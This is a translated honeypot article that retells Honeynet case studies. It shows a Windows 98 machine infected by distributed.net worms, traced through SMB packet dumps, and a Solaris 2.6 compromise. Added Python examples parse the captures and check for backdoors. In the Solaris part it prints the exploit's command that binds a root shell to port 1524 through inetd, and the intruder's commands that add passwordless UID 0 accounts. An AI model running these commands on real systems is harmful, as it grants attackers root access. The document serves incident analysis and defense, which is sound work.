Honeypot technology explanation
Created: 2001-03-03 Updated: 2003-11-13
Article attribute: original
Article Source:
http://www.xfocus.org
Email: Morrison@xfocus.org
Introduction
A couple of days ago a good friend told me a story. He had met someone on the Internet who claimed to be a hacker and said there was no system in China he could not get into. My friend was amazed at how high this level must be, but he also had his doubts. So he took a FreeBSD box, changed some of its banners, opened a few services with nc, backed up some of the SUID files, started a sniffer, created an ordinary local account and handed it to the man, assuring him he could go ahead since there was no way to get root locally. Later my friend laughed and told me: "You know what he did? Not one of his attempts worked. He tried a few Red Hat overflow exploits that would not even compile, and then told me 'your system has been backdoored'." I laughed too, but it made me think of honeypots.
Honeypot definition
A honeypot is a system built to observe how intruders probe and eventually break into systems. It holds data or applications that carry no risk to the organisation's confidentiality but are very tempting to an attacker. To anyone on your network it looks like an ordinary machine, but through some special configuration it works like a mousetrap. We do not use it to catch hackers; we want to watch how they work without their knowing they are being observed. The longer an intruder stays in the honeypot, the more of his techniques he reveals, and that information lets us judge his skill and learn the tools he uses. By learning their tools and their way of thinking we can better protect our own systems and networks.
A good honeypot means the intruder never learns he is being tracked. Of course, as the saying goes, "virtue is a foot high, the devil ten feet", and no honeypot catches every intruder. By "hacker" we simply mean someone who accesses a system without authorisation; that may be a 15-year-old or a 45-year-old company employee, and however much we learn about the people we track, we never know their real age.
Honeypots are not built the same way on every operating system, but the idea is always the same: the intruder must not know you are watching him, and ideally he should be able to open IRC on the box. If you are going to write up a case you cannot be ignorant of the background, so there are two papers you must read first. We start with "Know Your Enemy: Worms at War", followed by a UNIX case from the same series; after that we use nc to build a simple honeypot ourselves, and then look at WineD and DTK.
1. Honeypot on Windows
Over one month (2000/9/20 to 2000/10/20) our honeypot network logged 524 NetBIOS scans. These scans were probes of UDP port 137 (the NetBIOS name service), sometimes together with TCP port 139 (the NetBIOS session service). So much scanning for one particular service meant something was going on, and we decided to find out what. Our network is not advertised or announced anywhere on the Internet; it simply sits there, so all signs pointed to random scanning. Random or not, it still threatens the security of your systems, because these scans target Windows systems, quite possibly ordinary home users connected over DSL or cable. We are not talking about espionage or defaced home pages here; we only consider the ordinary home user as the target. We were curious: who is doing this scanning? What do they want? Why is there so much of it? Is it coordinated? Is it a worm? With all these questions we decided to find out, and set up our Windows honeypot: a default installation of Windows 98 with the C: drive shared. A Windows 98 honeypot is not very tempting, but even such a system can tell us what we want to know.
There is a huge number of Windows 98 systems on the Internet, and the number is growing fast. As a representative system it carries a large number of security holes, but home users do not recognise the risk of connecting to the Internet; most of them just focus on getting online.
This is our first Microsoft honeypot; it is simple, and we want to learn from it.
On 2000/10/31 the system was installed, the share was opened and it was connected to the Internet. We started waiting, and it turned out to be a long wait.
The first worm
After more than 24 hours our first visitor arrived. A system at 216.191.92.10 (host-010.hsf.on.ca) scanned our network looking for Windows systems, found our honeypot and began querying it. First it tried to get the system name and to determine whether a share was open. Once it found the share, it started checking for certain binaries on our system: its goal was to determine whether a particular worm was already installed on our honeypot and, if not, to install it. It was not, and the worm turned out to be Win32.Bymer. The purpose of this worm is to use the CPU of the infected host to help someone win the distributed.net contest. Distributed.net is an organisation that runs various challenges (such as cracking RC5-64) with prize money, using donated computing power; whoever wins the challenge gets the prize. Here our visitor made us a "volunteer" for the project by installing the worm.
Someone (bymer@inec.kiev.ua) wrote this self-replicating worm, which installs the distributed.net client on vulnerable, unsuspecting Windows systems. Once installed and run, the worm uses your CPU to help its author win the prize. Meanwhile it also probes for other systems it can infect: it wants as much CPU as possible, and its throughput grows with every system it compromises. Let us look at the packets captured on the network (we used Snort). To make the NetBIOS protocol easier to read you need a protocol analyser such as Ethereal. The sniffer trace follows; 172.16.1.105 is the address of our honeypot. First the worm checks for dnetc.ini on our system, the standard configuration file of the distributed.net client. This file tells the client who gets the credit for the work it does. Here we see the remote system (NetBIOS name GHUNT, account GHUNT, domain HSFOPROV) copying this file onto our honeypot.
11/01-15:29:18.580895 216.191.92.10:2900 -> 172.16.1.105:139
TCP TTL:112 TOS:0x0 ID:50235 DF
*****PA* Seq: 0x12930C6  Ack: 0x66B7068  Win: 0x2185
00 00 00 5B FF 53 4D 42 2D 00 00 00 00 00 01 00  ...[.SMB-.......
00 00 00 00 00 00 00 00 00 00 00 00 00 00 57 1C  ..............W.
00 00 82 D1 0F FF 00 00 00 07 00 91 00 16 00 20  ...............
00 DC 1C 00 3A 10 00 00 00 00 00 00 00           .............
00 00 00 1A 00 5C 57 49 4E 44 4F 57 53 5C 53 59  .....\WINDOWS\SY
53 54 45 4D 5C 64 6E 65 74 63 2E 69 6E 69 00     STEM\dnetc.ini.
In the next packet we can see the exact contents of the configuration file dnetc.ini as it is transferred. Note bymer@inec.kiev.ua, who receives the credit for the CPU time; this is most likely the author of the worm.
11/01-15:29:18.729337 216.191.92.10:2900 -> 172.16.1.105:139
TCP TTL:112 TOS:0x0 ID:50747 DF
*****PA* Seq: 0x1293125  Ack: 0x66B70AD  Win: 0x2140
00 00 01 11 FF 53 4D 42 0B 00 00 00 00 00 01 00  .....SMB........
00 00 00 00 00 00 00 00 00 00 00 00 00 00 57 1C  ..............W.
00 00 00 00 00 00 00 00 00 00 E1 00 E4           .............
00 01 E1 00 5B 6D 69 73 63 5D 20 0D 0A 70 72 6F  ....[misc] ..pro
6A 65 63 74 2D 70 72 69 6F 72 69 74 79 3D 4F 47  ject-priority=OG
52 2C 52 43 35 2C 43 53 43 2C 44 45 53 0D 0A 0D  R,RC5,CSC,DES...
0A 5B 70 61 72 61 6D 65 74 65 72 73 5D 0D 0A 69  .[parameters]..i
64 3D 62 79 6D 65 72 40 69 6E 65 63 2E 6B 69 65  d=bymer@inec.kie
76 2E 75 61 0D 0A 0D 0A 5B 72 63 35 5D 0D 0A 66  v.ua....[rc5]..f
65 74 63 68 2D 77 6F 72 6B 75 6E 69 74 2D 74 68  etch-workunit-th
72 65 73 68 6F 6C 64 3D 36 34 0D 0A 72 61 6E 64  reshold=64..rand
6F 6D 70 72 65 66 69 78 3D 32 31 37 0D 0A 0D 0A  omprefix=217....
5B 6F 67 72 5D 0D 0A 66 65 74 63 68 2D 77 6F 72  [ogr]..fetch-wor
6B 75 6E 69 74 2D 74 68 72 65 73 68 6F 6C 64 3D  kunit-threshold=
31 36 0D 0A 0D 0A 5B 74 72 69 67 67 65 72 73 5D  16....[triggers]
0D 0A 72 65 73 74 61 72 74 2D 6F 6E 2D 63 6F 6E  ..restart-on-con
66 69 67 2D 66 69 6C 65 2D 63 68 61 6E 67 65 3D  fig-file-change=
79 65 73 0D 0A                                   yes..
The next file transferred is the distributed.net client itself, dnetc.exe. This executable is a legitimate program, not a virus. To check whether the file had been tampered with, we took the MD5 of the file dropped on the honeypot, then downloaded the client from distributed.net and hashed it the same way. The two were identical (d0fd1f93913af70178bff1a1953f5f7d), so the client is unmodified: it is simply there to put your CPU to work in the contest, without anyone having asked you.
11/01-15:34:09.044822 216.191.92.10:2900 -> 172.16.1.105:139
TCP TTL:112 TOS:0x0 ID:33084 DF
*****PA* Seq: 0x129341A  Ack: 0x66B71C0  Win: 0x202D
00 00 00 5B FF 53 4D 42 2D 00 00 00 00 00 01 00  ...[.SMB-.......
00 00 00 00 00 00 00 00 00 00 00 00 00 00 57 1C  ..............W.
00 00 04 26 0F FF 00 00 00 07 00 91 00 16 00 20  ...&...........
00 FE 1D 00 3A 10 00 00 00 00 00 00 00           .............
00 00 00 1A 00 5C 57 49 4E 44 4F 57 53 5C 53 59  .....\WINDOWS\SY
53 54 45 4D 5C 64 6E 65 74 63 2E 65 78 65 00     STEM\dnetc.exe.
Next comes the actual worm program, msi216.exe. This is the self-replicating part: it searches for vulnerable systems and copies itself onto them, which is most likely what causes the large number of scans we see.
11/01-15:37:23.083643 216.191.92.10:2900 -> 172.16.1.105:139
TCP TTL:112 TOS:0x0 ID:40765 DF
*****PA* Seq: 0x12C146A  Ack: 0x66C248B  Win: 0x20B2
00 00 00 5C FF 53 4D 42 2D 00 00 00 00 00 01 00  ...\.SMB-.......
00 00 00 00 00 00 00 00 00 00 00 00 00 00 57 1C  ..............W.
00 00 02 F3 0F FF 00 00 00 07 00 91 00 16 00 20  ...............
00 C0 1E 00 3A 10 00 00 00 00 00 00 00           .............
00 00 00 1B 00 5C 57 49 4E 44 4F 57 53 5C 53 59  .....\WINDOWS\SY
53 54 45 4D 5C 6D 73 69 32 31 36 2E 65 78 65 00  STEM\msi216.exe.
Finally the worm uploads a new win.ini. The reason is that its program has to be executed when the system restarts: it is hard to execute a program directly on a remote Windows 98 system, so the worm modifies C:\Windows\win.ini to have its file loaded automatically. This new win.ini is uploaded to our system.
11/01-15:38:55.352810 216.191.92.10:2900 -> 172.16.1.105:139
TCP TTL:112 TOS:0x0 ID:1342 DF
******A* Seq: 0x12C6F55  Ack: 0x66C95FC  Win: 0x1FBF
00 00 0B 68 FF 53 4D 42 1D 00 00 00 00 00 01 00  ...h.SMB........
00 00 00 00 00 00 00 00 00 00 00 00 00 00 57 1C  ..............W.
(next two header lines unreadable in the source)
5B 77 69 6E 64 6F 77 73 5D 0D 0A 6C 6F 61 64 3D  [windows]..load=
63 3A 5C 77 69 6E 64 6F 77 73 5C 73 79 73 74 65  c:\windows\syste
6D 5C 6D 73 69 32 31 36 2E 65 78 65 0D 0A 72 75  m\msi216.exe..ru
6E 3D 0D 0A 4E 75 6C 6C 50 6F 72 74 3D 4E 6F 6E  n=..NullPort=Non
65 0D 0A 0D 0A 5B 44 65 73 6B 74 6F 70 5D 0D 0A  e....[Desktop]..
57 61 6C 6C 70 61 70 65 72 3D 28 4E 6F 6E 65 29  Wallpaper=(None)
0D 0A 54 69 6C 65 57 61 6C 6C 70 61 70 65 72 3D  ..TileWallpaper=
31 0D 0A 57 61 6C 6C 70 61 70 65 72 53 74 79 6C  1..WallpaperStyl
65 3D 30 0D 0A 0D 0A 5B 69 6E 74 6C 5D 0D 0A 69  e=0....[intl]..i
At this point the worm has finished its intrusion and our honeypot is infected. All that is left is for us to reboot the system, at which point the worm takes effect. Once it runs, the following happens:
The distributed.net client starts and puts the CPU to work on the contest.
The worm begins searching for vulnerable systems and copying itself; this is the source of the UDP 137 and TCP 139 scanning.
The worm adds the following registry values:
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\bymer.scanner
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunServices\bymer.scanner
Relying on a reboot to execute the program may seem unreliable, but remember the target is a Windows desktop: how long do you go without rebooting Windows?
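Reading captures like the ones above by eye is slow, and the point of keeping them is to know exactly which files were dropped and how the worm arranged to be started. The following is an added example, not the article's or the Honeynet Project's tooling: it parses Snort's hex-dump output, pulls the NUL-terminated DOS paths out of the SMB requests (the files the worm opened or created), and parses an uploaded win.ini to list what its [windows] load= and run= lines will start at the next logon. The sample dump is constructed here; its payload bytes are taken from the captures on this page, with the SMB headers left out.

```python
"""Decode Snort-style hex dumps like the ones above and pull out what the worm
dropped: the file names it wrote over SMB and the win.ini autorun entries.
Added example, not the article's or the Honeynet Project's tooling; the
sample dump is constructed here (its payload bytes mirror this page's captures)."""
import re
from typing import Dict, List, Tuple

# Packet header as Snort prints it: "11/01-15:29:18.580895 216.191.92.10:2900 -> 172.16.1.105:139"
HEADER_RE = re.compile(
    r"^(?P<ts>\d\d/\d\d-\d\d:\d\d:\d\d\.\d+)\s+"
    r"(?P<src>[\d.]+):(?P<sport>\d+)\s+->\s+(?P<dst>[\d.]+):(?P<dport>\d+)$"
)
HEX_PAIR_RE = re.compile(r"^[0-9A-Fa-f]{2}$")
# A NUL-terminated DOS path ending in a file extension, as sent in SMB open/create requests.
SMB_PATH_RE = re.compile(rb"\\[\x20-\x7e]*?\.(?:exe|ini|com|dll|vxd|bat)(?=\x00)", re.IGNORECASE)


def parse_snort_dump(text: str) -> List[Dict]:
    """Split a Snort '-d' dump into packets: header fields plus raw payload bytes."""
    packets: List[Dict] = []
    for line in text.splitlines():
        m = HEADER_RE.match(line.strip())
        if m:
            packets.append({**m.groupdict(), "payload": bytearray()})
            continue
        if not packets:
            continue
        # Snort prints 16 "%02X " columns (48 chars) and then the ASCII column.
        # Only the fixed-width hex region is read, and reading stops at the first
        # non-hex token, so ASCII text such as "AA" is never mistaken for a byte.
        for token in line[:48].split():
            if not HEX_PAIR_RE.match(token):
                break
            packets[-1]["payload"].append(int(token, 16))
    for p in packets:
        p["payload"] = bytes(p["payload"])
    return packets


def smb_paths(payload: bytes) -> List[str]:
    """File names the client asked the server to open or create."""
    return [m.group(0).decode("ascii") for m in SMB_PATH_RE.finditer(payload)]


def parse_ini(text: str) -> Dict[str, Dict[str, str]]:
    """Minimal INI parser; section and key names are folded to lower case."""
    sections: Dict[str, Dict[str, str]] = {}
    current = ""
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith(";"):
            continue
        if line.startswith("[") and line.endswith("]"):
            current = line[1:-1].lower()
            sections.setdefault(current, {})
        elif "=" in line:
            key, _, value = line.partition("=")
            sections.setdefault(current, {})[key.strip().lower()] = value.strip()
    return sections


def win_ini_autoruns(payload: bytes) -> List[Tuple[str, str]]:
    """Programs the [windows] load= and run= lines start at logon.  Both keys
    may list several programs separated by spaces, which is how the second
    worm later chained itself in front of the first."""
    ini = parse_ini(payload.decode("latin-1"))
    return [(key, prog)
            for key in ("load", "run")
            for prog in ini.get("windows", {}).get(key, "").split()]


def analyze(dump_text: str) -> Dict[str, list]:
    """Everything the capture shows being written and scheduled to run."""
    written, autoruns = [], []
    for pkt in parse_snort_dump(dump_text):
        written += smb_paths(pkt["payload"])
        autoruns += win_ini_autoruns(pkt["payload"])
    return {"written": written, "autoruns": autoruns}


# Constructed sample: the tail of the dnetc.ini open request and the start of
# the uploaded win.ini, in Snort's output format (SMB headers omitted).
SAMPLE_DUMP = r"""
11/01-15:29:18.580895 216.191.92.10:2900 -> 172.16.1.105:139
TCP TTL:112 TOS:0x0 ID:50235 DF
*****PA* Seq: 0x12930C6  Ack: 0x66B7068  Win: 0x2185
00 00 00 1A 00 5C 57 49 4E 44 4F 57 53 5C 53 59  .....\WINDOWS\SY
53 54 45 4D 5C 64 6E 65 74 63 2E 69 6E 69 00     STEM\dnetc.ini.

11/01-15:38:55.352810 216.191.92.10:2900 -> 172.16.1.105:139
TCP TTL:112 TOS:0x0 ID:1342 DF
******A* Seq: 0x12C6F55  Ack: 0x66C95FC  Win: 0x1FBF
5B 77 69 6E 64 6F 77 73 5D 0D 0A 6C 6F 61 64 3D  [windows]..load=
63 3A 5C 77 69 6E 64 6F 77 73 5C 73 79 73 74 65  c:\windows\syste
6D 5C 6D 73 69 32 31 36 2E 65 78 65 0D 0A 72 75  m\msi216.exe..ru
6E 3D 0D 0A 4E 75 6C 6C 50 6F 72 74 3D 4E 6F 6E  n=..NullPort=Non
65 0D 0A 0D 0A 5B 44 65 73 6B 74 6F 70 5D 0D 0A  e....[Desktop]..
57 61 6C 6C 70 61 70 65 72 3D 28 4E 6F 6E 65 29  Wallpaper=(None)
"""

if __name__ == "__main__":
    print(analyze(SAMPLE_DUMP))
```

Feed it the text of a Snort log written with -d. Paths are only reported when NUL-terminated, which is how the SMB client sends them, so strings inside file contents (such as the c:\windows\system\msi216.exe inside win.ini itself) are not mistaken for files being created.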
The second worm
It was a busy week: the very next day our second worm arrived. This one is a variant of the first, and again takes your CPU for the distributed.net contest. The difference is that everything is combined into a single executable, wininit.exe; a default installation already has a C:\Windows\wininit.exe, so the name is chosen to hide: anyone who finds the binary will take it for a system file rather than a worm. This is a very common trick in the hacker community. Once executed, this worm behaves like the first. Below we see our honeypot being infected by the second worm; the remote system's NetBIOS name is WINDOW, account WINDOW, domain LVCW.
11/02-21:41:17.287743 216.234.204.69:2021 -> 172.16.1.105:139
TCP TTL:113 TOS:0x0 ID:38619 DF
*****PA* Seq: 0x21CC0AC  Ack: 0xCE6736B  Win: 0x2185
00 00 00 5D FF 53 4D 42 2D 00 00 00 00 00 01 00  ...].SMB-.......
00 00 00 00 00 00 00 00 00 00 00 00 00 00 4F 1F  ..............O.
00 00 07 EE 0F FF 00 00 00 07 00 91 00 16 00 20  ...............
00 20 BB 01 3A 10 00 00 00 00 00 00 00 00 00 00  . ..:...........
00 00 00 1C 00 5C 57 49 4E 44 4F 57 53 5C 53 59  .....\WINDOWS\SY
53 54 45 4D 5C 77 69 6E 69 6E 69 74 2E 65 78 65  STEM\wininit.exe
00                                               .
Once the worm has installed itself, the remote system modifies win.ini to make sure it is executed on reboot. Notice how this executable is added to the already modified C:\Windows\win.ini, which still carries the entry from the previous worm, so the earlier program keeps starting too.
11/02-21:41:48.538643 216.234.204.69:2021 -> 172.16.1.105:139
TCP TTL:113 TOS:0x0 ID:21212 DF
******A* Seq: 0x22021C9  Ack: 0xCE68EC7  Win: 0x1FA3
00 00 0B 68 FF 53 4D 42 1D 00 00 00 00 00 01 00  ...h.SMB........
00 00 00 00 00 00 00 00 00 00 00 00 00 00 4F 1F  ..............O.
00 00 84 F4 0C 0F 00 7F 19 00 00 00 00 00 00     ...............
(next header line unreadable in the source)
5B 77 69 6E 64 6F 77 73 5D 0D 0A 6C 6F 61 64 3D  [windows]..load=
63 3A 5C 77 69 6E 64 6F 77 73 5C 73 79 73 74 65  c:\windows\syste
6D 5C 77 69 6E 69 6E 69 74 2E 65 78 65 20 63 3A  m\wininit.exe c:
5C 77 69 6E 64 6F 77 73 5C 73 79 73 74 65 6D 5C  \windows\system\
6D 73 69 32 31 36 2E 65 78 65 0D 0A 72 75 6E 3D  msi216.exe..run=
0D 0A 4E 75 6C 6C 50 6F 72 74 3D 4E 6F 6E 65 0D  ..NullPort=None.
0A 0D 0A 5B 44 65 73 6B 74 6F 70 5D 0D 0A 57 61  ...[Desktop]..Wa
After a reboot the second worm starts up the same way as the first. The other side does not look much like a hacker: the owner of that system does not know a worm is running on it, has no idea it is being used to probe other hosts, and simply goes about his own business while connected to the Internet. Every host on a dial-up connection faces the same attack. What is under way is a war of automated worm probing and infection, exactly what our honeypot saw.
Afterwards
A day later the same worm probed our honeypot again: first it checked whether the share was open, then it found its files were already installed and left us alone. The same day another system checked whether the worm was already installed.
11/03-04:42:11.596636 210.111.145.180:2341 -> 172.16.1.105:139
TCP TTL:115 TOS:0x0 ID:12574 DF
*****PA* Seq: 0x2345C04  Ack: 0xE65CC94  Win: 0x2171
00 00 00 5D FF 53 4D 42 2D 00 00 00 00 00 01 00  ...].SMB-.......
00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 1D  ................
00 00 81 3E 0F FF 00 00 00 07 00 91 00 16 00 20  ...>...........
00 3A 26 02 3A 10 00 00 00 00 00 00 00 00 00 00  .:&.:...........
00 00 00 1C 00 5C 57 49 4E 44 4F 57 53 5C 53 59  .....\WINDOWS\SY
53 54 45 4D 5C 77 69 6E 69 6E 69 74 2E 65 78 65  STEM\wininit.exe
00                                               .
Remote system: NetBIOS name MATTHEW, account MPYLE, domain MPYLE
11/03-16:39:38.723572 216.23.6.24:3946 -> 172.16.1.105:139
TCP TTL:113 TOS:0x0 ID:3309 DF
*****PA* Seq: 0x1A7105F  Ack: 0x10F8C0F2  Win: 0x2159
00 00 00 5B FF 53 4D 42 2D 00 00 00 00 00 01 00  ...[.SMB-.......
(next header line unreadable in the source)
00 00 81 D9 0F FF 00 00 00 07 00 91 00 16 00 20  ...............
00 14 CE 02 3A 10 00 00 00 00 00 00 00 00        ..............
00 00 00 1A 00 5C 57 49 4E 44 4F 57 53 5C 53 59  .....\WINDOWS\SY
53 54 45 4D 5C 64 6E 65 74 63 2E 69 6E 69 00     STEM\dnetc.ini.
The next day, 4 November, a system at 207.224.254.206 (NetBIOS name SOCCERDOG, domain RONS) checked whether dnetc.ini was installed and, seeing that it was, left. In three days our honeypot received a total of 5 probes. At this point the honeypot itself started trying to connect to bymer.boom.ru over HTTP.
This is probably the worm trying to reach its master server for updates.
bymer.boom.ru appears to have been the worm's controller at some point. By now, however, it resolves to 192.168.0.1, an RFC 1918 private address, which suggests the domain's administrators shut the worm down. We are not sure why the worm was already running, as we had not rebooted; perhaps it does not always need a restart. One drawback of Windows is that there is so little information: there are no logs. Below we see the honeypot initiating a connection to bymer.boom.ru, most likely its master server.
11/04-23:56:38.855453 172.16.1.105:1027 -> 192.168.0.1:80
TCP TTL:127 TOS:0x0 ID:65300 DF
******S* Seq: 0x17AF8D9A  Ack: 0x0  Win: 0x2000
TCP Options => MSS: 1460 NOP NOP SackOK
The dnetc.exe client then connects to the distributed.net server and starts transferring data. To distributed.net's credit, this is not part of the worm's replication. It is the worm's final goal being met: consume CPU and upload the results to distributed.net.
11/04-23:56:40.286898 172.16.1.105:1029 -> 204.152.186.139:2064
TCP TTL:127 TOS:0x0 ID:1301 DF
*****PA* Seq: 0x17AF8F47  Ack: 0xBE445ED3  Win: 0x2238
AE 23 E2 77 F6 42 91 51 3e 61 3F EE 86 7F EE 8B. #. W.b.q> a? .....
CE 9E 9D 28 16 BD 4B C5 5E DB FA 62 A6 FA A8 ff ... (.. k. ^ .. B ....
EF 19 57 9C 37 38 06 39 7F 56 B4 D6 C7 75 63 73 ..W.78.9.V ... UCS
0F 94 12 10 57 B2 C0 AD 9F D1 6F 4A E7 F0 1D E7 .... W ..... OJ ....
30 0E CC 84 78 2D 7B 21 C0 4C 29 BE 08 6A D8 5B 0 ... x - {!. l) .. j.
50 89 86 F8 98 A8 35 95 E0 C6 E4 32 28 E5 92 CF P ..... 5 ... 2 (...
71 04 41 6C B9 22 F0 09 01 41 9e A6 49 60 4D 43 Q.al. "... A..I`mc
91 7e FB E0 D9 9D AA 7D 21 BC 59 1A 69 DB 07 B7. ~ .....} !. Y.I ...
B1 F9 B6 54 FA 18 64 F1 42 37 13 8e 8A 55 C2 2B ... t..d.b7 ... u.
CF 32 45 19 1A 93 1F 65 62 B1 CE 02 AA D0 7C 9e .2e .... EB .....
C5 46 78 29 F0 13 97 04 .fx) ....
Once the upload is done, the worm starts searching the Internet for vulnerable systems and copying itself. It picks IP addresses at random and scans ports 137 and 139 of each; systems found to be vulnerable are marked and infected. If the honeypot environment is designed to block malicious traffic leaving a compromised honeypot, these scans never reach the Internet. The honeypot works like a "roach motel": the bad guys check in, but they do not check out. Below we see the worm trying to find other vulnerable systems.
11/04-23:58:05.946299 172.16.1.105:137 -> 39.202.248.187:137
UDP TTL:127 TOS:0x0 ID:30485
Len: 58
0E 94 00 10 00 01 00 00 00 00 00 00 20 43 4B 41  ............ CKA
41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA
41 41 41 41 41 41 41 41 41 41 41 41 41 00 00 21  AAAAAAAAAAAAA..!
00 01                                            ..
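The UDP packet above is a NetBIOS node-status request for the wildcard name. The 32-letter string CKAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA is the name "*" in NetBIOS first-level encoding: every byte of the 16-byte name field (15 name bytes plus a service suffix) is split into two nibbles and each nibble is written as the letter A plus its value, so 0x2A ("*") becomes "CK" and the NUL padding becomes "AA". The following added example (not the article's code) encodes and decodes such names and parses the query; SAMPLE_QUERY is built here from the bytes in the capture above.

```python
"""Decode the NetBIOS name-service query in the UDP/137 packet above.  Added
example, not the article's code; SAMPLE_QUERY is constructed here from the
bytes in that capture."""
import struct
from typing import Dict, Tuple

NBNS_QTYPES = {0x0020: "NB", 0x0021: "NBSTAT"}


def encode_nb_name(name: str, suffix: int) -> bytes:
    """First-level encoding: the 15-byte name plus a 1-byte service suffix are
    split into nibbles and each nibble is written as 'A' + nibble, giving 32
    letters from A to P.  The wildcard "*" is padded with NULs, other names
    with spaces."""
    pad = b"\x00" if name == "*" else b" "
    raw = name.encode("latin-1").ljust(15, pad)[:15] + bytes([suffix & 0xFF])
    return bytes(c for b in raw for c in (0x41 + (b >> 4), 0x41 + (b & 0x0F)))


def decode_nb_name(encoded: bytes) -> Tuple[str, int]:
    """Reverse of encode_nb_name; returns (name, suffix)."""
    if len(encoded) != 32:
        raise ValueError("encoded NetBIOS name must be 32 bytes")
    raw = bytearray()
    for hi, lo in zip(encoded[0::2], encoded[1::2]):
        if not (0x41 <= hi <= 0x50 and 0x41 <= lo <= 0x50):
            raise ValueError("byte outside A..P in encoded name")
        raw.append(((hi - 0x41) << 4) | (lo - 0x41))
    return raw[:15].rstrip(b" \x00").decode("latin-1"), raw[15]


def parse_nbns_query(pkt: bytes) -> Dict:
    """Parse a one-question NBNS request: RFC 1002 header, then the question."""
    if len(pkt) < 12:
        raise ValueError("short NBNS packet")
    txid, flags, qdcount, _an, _ns, _ar = struct.unpack(">HHHHHH", pkt[:12])
    if flags & 0x8000:
        raise ValueError("response bit set; not a query")
    if qdcount != 1:
        raise ValueError("expected exactly one question")
    pos = 12
    if pkt[pos] != 32:
        raise ValueError("unexpected label length (scoped names not handled)")
    name, suffix = decode_nb_name(pkt[pos + 1:pos + 33])
    pos += 33
    if pkt[pos] != 0:
        raise ValueError("name not terminated")
    qtype, qclass = struct.unpack(">HH", pkt[pos + 1:pos + 5])
    return {
        "txid": txid,
        "broadcast": bool(flags & 0x0010),  # the B bit of NM_FLAGS
        "name": name,
        "suffix": suffix,
        "qtype": NBNS_QTYPES.get(qtype, hex(qtype)),
        "qclass": qclass,
        # A node-status request for "*" is what nbtstat -A sends, and what the
        # worm sends to every random address it probes.
        "is_node_status_scan": qtype == 0x0021 and name == "*",
    }


# Constructed from the capture above: id 0x0e94, flags 0x0010 (broadcast bit),
# one question, the encoded wildcard name, type NBSTAT, class IN.
SAMPLE_QUERY = (struct.pack(">HHHHHH", 0x0E94, 0x0010, 1, 0, 0, 0)
                + b"\x20" + b"CK" + b"A" * 30 + b"\x00"
                + struct.pack(">HH", 0x0021, 0x0001))

if __name__ == "__main__":
    print(parse_nbns_query(SAMPLE_QUERY))
```

A stream of such requests from one host to many random addresses, as the honeypot produced after infection, is the signature the outbound filter on a honeynet needs to catch; the same decoder run on inbound traffic shows what the 524 scans in the first paragraph were asking.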
Another thing I found interesting: the C:\Windows\win.ini configuration file was modified once more, I believe by wininit.exe, and this worm removed msi216.exe from the boot configuration. dnetc.ini was modified too, with the e-mail address changed from bymer@inec.kiev.ua to bymer@ukrpost.net, which shows the second worm trying to strip the first worm's configuration and replace it with its own. It looks like competition in nature: one worm fighting another for territory, or in this case for CPU.
We have described four days in which our Windows 98 system was compromised by several worms. These worms automatically probe for vulnerable systems and infect whatever they find; at present they are after NetBIOS holes. Of course, not all NetBIOS scanning looks like this, and not every worm is a distributed.net worm. Imagine a worm modified to snoop for secrets on your system: it could just as easily search for confidential material such as financial data and, once found, send it to an anonymous mail account, an IRC channel or a compromised web server.
Thanks to H. Carvey and Ryan Russell, the main technical contributors. For more information see
http://distributed.net or
http://www.cert.org.
2. A honeypot case on UNIX
This part is also taken from the Know Your Enemy series. As with the previous part, the aim is not to explain how to implement a honeypot on UNIX but to understand the tools hackers use and their strategy. It is in three parts: how the system was attacked, what was done to it once it was taken, and, information that is rarely published, why they do it, drawn from the intruders' own conversations and behaviour on a system they believed was theirs. When they thought this Solaris 2.6 system had been broken, they installed IRC on it. We logged every IRC conversation, and fourteen days of observations are recorded here; I hope they are revealing.
The system is compromised
Our honeypot was a default installation of Solaris 2.6; we made no modifications and installed no patches. We built it to attract hackers so that we could study their thinking through their actions. On 4 June 2000 the system was compromised through the rpc.ttdbserv vulnerability, a remotely exploitable hole in the ToolTalk object database server (CVE-1999-0003, BugTraq ID 122) that is listed in the SANS Top 10. Our IDS, Snort, logged it as follows:
Jun  4 11:37:58 lisa snort[5894]: IDS241/rpc.ttdbserv-solaris-kill: 192.168.78.12:877 -> 172.16.1.107:32775
The rpc.ttdbserv vulnerability is a buffer overflow that lets a remote user execute commands as root. The exploit ran the command below, which installs a backdoor: an ingreslock service (port 1524) is appended to a file called /tmp/bob, and inetd is started with that file as its configuration. Once it runs, anyone connecting to port 1524 gets a root shell and full access to the system.
/bin/ksh -c echo 'ingreslock stream tcp nowait root /bin/sh sh -i' >> /tmp/bob ; /usr/sbin/inetd -s /tmp/bob
Once the backdoor was installed, the hacker connected to port 1524, obtained a root shell and ran the commands below. Two accounts were added to our system so that he could come back over telnet. Note the errors and control characters in what follows: the shell bound to port 1524 has no proper terminal environment.
# cp /etc/passwd /etc/.tp;
^Mcp /etc/shadow /etc/.ts;
echo "r:x:0:0:User:/:/sbin/sh" >> /etc/passwd;
echo "re:x:500:1000:daem:/:/sbin/sh" >> /etc/passwd;
echo "r::10891::::::" >> /etc/shadow;
echo "re::6445::::::" >> /etc/shadow;
: not found
# ^M: not found
# ^M: not found
# ^M: not found
# ^M: not found
# ^M: not found
# who;
rsmith     console      May 24 21:09
^M: not found
# exit;
Now that he has two accounts, re and r, on our system, he can telnet in as re and su to r, which has UID 0. We follow him through the keystroke log.
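The two things the intruder has done so far, the inetd backdoor planted by the exploit and the accounts appended to passwd and shadow, are both easy to check for after the fact. The following is an added example, not the article's or the Honeynet Project's code: it parses inetd.conf-style, passwd, shadow and ps -u root text (all constructed here after the lines above) and flags what a responder wants to see: a service whose server program is a shell, a second UID 0 account, shadow entries with an empty password field (presumably why the telnet login below is told to choose a new password), and a second inetd process running with its own configuration.

```python
"""Checks for the two changes the intruder made above: an inetd entry that
serves a root shell, and accounts appended to passwd and shadow.  Added
example, not the article's or the Honeynet Project's code; the sample files
are constructed here after the lines shown on this page."""
from typing import Dict, List, NamedTuple

InetdEntry = NamedTuple("InetdEntry", [("service", str), ("socktype", str), ("proto", str),
                                       ("wait", str), ("user", str), ("server", str),
                                       ("args", List[str])])
SHELLS = {"sh", "ksh", "csh", "bash", "zsh", "tcsh"}


def parse_inetd_conf(text: str) -> List[InetdEntry]:
    """inetd.conf format: service socktype proto wait/nowait user server [args...]."""
    entries = []
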